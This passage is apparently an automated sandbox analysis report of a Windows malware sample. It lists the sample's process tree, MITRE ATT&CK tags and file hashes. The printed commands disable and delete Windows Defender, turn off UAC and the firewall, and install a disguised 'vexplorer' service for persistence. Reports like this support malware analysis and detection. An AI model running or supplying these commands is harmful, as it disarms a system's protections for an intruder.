C:\Windows\system32\reg.exereg ADD "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t "REG_DWORD" /d 1 /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f2⤵
- UAC bypass
PID:1532 -
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f2⤵PID:1528
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f2⤵PID:1580
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f2⤵PID:1628
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f2⤵PID:892
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f2⤵PID:1760
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f2⤵PID:1472
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f2⤵PID:1856
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:948 -
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1600 -
C:\Windows\system32\reg.exereg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064 -
C:\Windows\system32\reg.exereg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /va /f2⤵PID:1016
-
C:\Windows\system32\reg.exereg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /va /f2⤵PID:1960
-
C:\Users\Admin\AppData\Roaming\explorer\tweak.exe"C:\Users\Admin\AppData\Roaming\explorer\tweak.exe" /o /c Windows-Defender /r2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\system32\sc.exesc stop "vexplorer"2⤵
- Launches sc.exe
PID:1936 -
C:\Windows\system32\sc.exesc config "vexplorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""2⤵
- Launches sc.exe
PID:624 -
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "ServicesPipeTimeout" /t "REG_DWORD" /d 864000000 /f2⤵PID:1316
-
C:\Windows\system32\sc.exesc create "vexplorer" start= auto displayname= "Windows Explorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""2⤵
- Launches sc.exe
PID:1816 -
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer" /v "Description" /t "REG_SZ" /d "Windows explorer directory and files" /f2⤵PID:1308
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer\Parameters" /v "Application" /t "REG_SZ" /d "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\"" /f2⤵PID:468
-
C:\Windows\system32\sc.exesc config "vexplorer" start= auto2⤵
- Launches sc.exe
PID:1164 -
C:\Windows\system32\netsh.exenetsh firewall set notifications mode = disable profile = all2⤵
- Modifies Windows Firewall
PID:452 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
PID:956 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="lib"2⤵
- Modifies Windows Firewall
PID:428 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="svchostt"2⤵
- Modifies Windows Firewall
PID:1384 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="explorer"2⤵
- Modifies Windows Firewall
PID:1256 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="X3A"2⤵
- Modifies Windows Firewall
PID:1976 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="lib" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\lib.txt" enable=yes2⤵
- Modifies Windows Firewall
PID:1584 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="X3A" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\X3A.exe" enable=yes2⤵
- Modifies Windows Firewall
PID:1628 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="explorer" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg" enable=yes2⤵
- Modifies Windows Firewall
PID:920 -
C:\Windows\system32\attrib.exeattrib +h /s /d *.*2⤵
- Views/modifies file attributes
PID:1600 -
C:\Users\Admin\AppData\Roaming\explorer\X3A.exeX3A.exe /AutoIt3ExecuteScript explorer.cfg2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies system certificate store
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:552 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc stop "vexplorer"3⤵PID:1756
-
C:\Windows\system32\sc.exesc stop "vexplorer"4⤵
- Launches sc.exe
PID:1764 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc config "vexplorer" binpath= "%appdata%\explorer\X3A.exe /AutoIt3ExecuteScript \"%appdata%\explorer\explorer.cfg\""3⤵PID:1672
-
C:\Windows\system32\sc.exesc config "vexplorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""4⤵
- Launches sc.exe
PID:1540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "ServicesPipeTimeout" /t "REG_DWORD" /d 864000000 /f3⤵PID:1380
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "ServicesPipeTimeout" /t "REG_DWORD" /d 864000000 /f4⤵PID:1164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc create "vexplorer" start= delayed-auto displayname= "Windows Explorer" binpath= "%appdata%\explorer\X3A.exe /AutoIt3ExecuteScript \"%appdata%\explorer\explorer.cfg\""3⤵PID:1168
-
C:\Windows\system32\sc.exesc create "vexplorer" start= delayed-auto displayname= "Windows Explorer" binpath= "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\""4⤵
- Launches sc.exe
PID:560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer" /v "Description" /t "REG_SZ" /d "Windows explorer directory and files" /f3⤵PID:1176
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer" /v "Description" /t "REG_SZ" /d "Windows explorer directory and files" /f4⤵PID:1776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer\Parameters" /v "Application" /t "REG_SZ" /d "%appdata%\explorer\X3A.exe /AutoIt3ExecuteScript \"%appdata%\explorer\explorer.cfg\"" /f3⤵PID:1980
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vexplorer\Parameters" /v "Application" /t "REG_SZ" /d "C:\Users\Admin\AppData\Roaming\explorer\X3A.exe /AutoIt3ExecuteScript \"C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg\"" /f4⤵PID:1376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc config "vexplorer" start= delayed-auto3⤵PID:1948
-
C:\Windows\system32\sc.exesc config "vexplorer" start= delayed-auto4⤵
- Launches sc.exe
PID:1956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f3⤵PID:1324
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f4⤵
- UAC bypass
PID:1572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t "REG_DWORD" /d 1 /f3⤵PID:1124
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t "REG_DWORD" /d 1 /f4⤵PID:1732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t "REG_DWORD" /d 1 /f3⤵PID:1728
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t "REG_DWORD" /d 1 /f4⤵PID:860
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C Powershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵PID:2040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Set-MpPreference -DisableRealtimeMonitoring $true4⤵PID:1704
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f3⤵PID:1652
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f4⤵PID:932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f3⤵PID:824
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f4⤵PID:1600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f3⤵PID:1700
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f4⤵PID:544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f3⤵PID:1696
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f4⤵PID:1684
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f3⤵PID:1756
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f4⤵PID:664
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f3⤵PID:1316
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f4⤵PID:468
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f3⤵PID:1164
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d 1 /f4⤵PID:1520
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f3⤵PID:976
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t "REG_DWORD" /d 1 /f4⤵PID:580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f3⤵PID:1344
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t "REG_DWORD" /d 1 /f4⤵PID:1056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f3⤵PID:1496
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t "REG_DWORD" /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f3⤵PID:1792
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t "REG_DWORD" /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f3⤵PID:1708
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t "REG_DWORD" /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1780 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc config WinDefend start= disabled3⤵PID:2012
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:2020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc stop windefend3⤵PID:1532
-
C:\Windows\system32\sc.exesc stop windefend4⤵
- Launches sc.exe
PID:2028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C sc delete windefend3⤵PID:1800
-
C:\Windows\system32\sc.exesc delete windefend4⤵
- Launches sc.exe
PID:1584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /va /f3⤵PID:884
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /va /f4⤵PID:1564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /va /f3⤵PID:1476
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /va /f4⤵PID:1628
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DEL /F /S /Q "C:\ProgramData\Microsoft\Windows Defender"3⤵PID:948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DEL /F /S /Q "C:\Program Files (x86)\Windows Defender"3⤵PID:1372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DEL /F /S /Q "C:\Program Files\Windows Defender"3⤵PID:544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh firewall set notifications mode = disable profile = all3⤵PID:1764
-
C:\Windows\system32\netsh.exenetsh firewall set notifications mode = disable profile = all4⤵
- Modifies Windows Firewall
PID:1744 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall set allprofiles state off3⤵PID:820
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
PID:1316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="FTP1"3⤵PID:1284
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="FTP1"4⤵
- Modifies Windows Firewall
PID:960 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="FTP2"3⤵PID:1776
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="FTP2"4⤵
- Modifies Windows Firewall
PID:996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="lib"3⤵PID:1948
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="lib"4⤵
- Modifies Windows Firewall
PID:856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="explorer"3⤵PID:1072
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="explorer"4⤵
- Modifies Windows Firewall
PID:1732 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall Delete rule name="X3A"3⤵PID:1548
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall Delete rule name="X3A"4⤵
- Modifies Windows Firewall
PID:1788 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="FTP1" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes3⤵PID:884
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="FTP1" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:1944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="FTP2" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes3⤵PID:1600
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="FTP2" dir=in action=allow program="C:\Windows\system32\ftp.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="lib" dir=in action=allow program="%appdata%\explorer\lib.txt" enable=yes3⤵PID:892
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="lib" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\lib.txt" enable=yes4⤵
- Modifies Windows Firewall
PID:664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="X3A" dir=in action=allow program="%appdata%\explorer\X3A.exe" enable=yes3⤵PID:468
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="X3A" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\X3A.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:1912 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="explorer" dir=in action=allow program="%appdata%\explorer\explorer.cfg" enable=yes3⤵PID:796
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="explorer" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\explorer\explorer.cfg" enable=yes4⤵
- Modifies Windows Firewall
PID:1716
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1361509397-94934578-1433640333-21156073311706238779-104385062819222712592037543300"1⤵PID:1684
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Modify Existing Service
3New Service
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
744KB
MD5efcb002abc3529d71b61e6fb6434566c
SHA1a25aca0fc9a1139f44329b28dc13c526965d311f
SHA256b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd
SHA51210ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687
-
Filesize
179KB
MD56a4bd682396f29fd7df5ab389509b950
SHA146f502bec487bd6112f333d1ada1ec98a416d35f
SHA256328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb
SHA51235ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751
-
Filesize
283KB
MD5f2b0771a7cd27f20689e0ab787b7eb7c
SHA1eb56e313cd23cb77524ef0db1309aebb0b36f7ef
SHA2567c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f
SHA5125ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a
-
Filesize
109KB
MD55488e381238ff19687fdd7ab2f44cfcc
SHA1b90fa27ef6a7fc6d543ba33d5c934180e17297d3
SHA256abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0
SHA512933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412
-
Filesize
94KB
MD59a821d8d62f4c60232b856e98cba7e4f
SHA14ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5
SHA256a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525
SHA5121b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3
-
Filesize
425KB
MD5fc2db5842190c6e78a40cd7da483b27c
SHA1e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0
SHA256e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82
SHA512d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6
-
Filesize
52KB
MD5c9d74156913061be6c51d8fc3acf8e93
SHA14a4c6473a478256e4c78b423e918191118e01093
SHA256af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37
SHA512c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047
-
Filesize
306KB
MD5bbb9e4fa2561f6a6e5ccf25da069ac1b
SHA12d353ec70c7a13ac5749d2205ac732213505082a
SHA256b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1
SHA51201f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e
-
Filesize
104KB
MD562de64dc805fd98af3ada9d93209f6a9
SHA1392ba504973d626aaf5c5b41b184670c58ec65a7
SHA25683c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc
SHA5127db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28
-
Filesize
211KB
MD545ff4fa5ca5432bfccded4433fe2a85b
SHA1858c42499dd9d2198a6489dd310dc5cbff1e8d6e
SHA2568a85869b2d61bad50d816daf08df080f8039dbeb1208009a73daa7be83d032bd
SHA512abbe0f673d18cc9a922cfd677e5b88714a3049ad8937f836b5a8b9bddac5ddbad4dc143360efc018dcd3a3440aa3e516b1a97f7cd2fa9a55cb73739dedef1589
-
Filesize
124KB
MD5e7caed467f80b29f4e63ba493614dbb1
SHA165a159bcdb68c7514e4f5b65413678c673d2d0c9
SHA2562c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c
SHA51234952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e
-
Filesize
265KB
MD5fe447d1cd38cecac2331fa932078d9a0
SHA1ebd99d5eb3403f547821ce51c193afc86ecf4bcf
SHA25605fe0897be3f79773c06b7ba4c152eec810fd895bf566d837829ec04c4f4338d
SHA512801e47c6c62a2d17ed7dd430a489507faf6074471f191f66862fd732924ad9a4bd1efe603354ed06d16c4d5c31a044126c4cc2dbbd8ffece2ed7632358ee7779
-
Filesize
434KB
MD5739968678548ba15f6b9372e8760c012
SHA1691b09af08b64b01c3db7ffe2aa625c9be375686
SHA2564ce7afb5c5a44c4c9d0119d7306134e3412467bddcbf5b7da2786e5d64528d11
SHA5128075d3ce9e462777b143fad03f25ddb6cc8b5e2512aa475850eba39a5ef3be3364e7704620b8c444449bbe143b6ffa307428b93bc5e7e0b5738cf36aaf0c969b
-
Filesize
295KB
MD58d3855b133e21143e8b4bfadb9fb14a3
SHA125d729e8455a1f19d0dc59c0962908a146a62935
SHA2563b3118cb4a65cb27a182d044c7b9cfc17581d3fabab094d174b5e54df4ddf5e4
SHA5124e67bcc6f6bd396350d550f5564dd9b1d939d8b6a48706280ee5c1b7205579355dfeb5425f99656455d958f6b61ceee3986488d27de824ed5b9ce14e43aea5f5
-
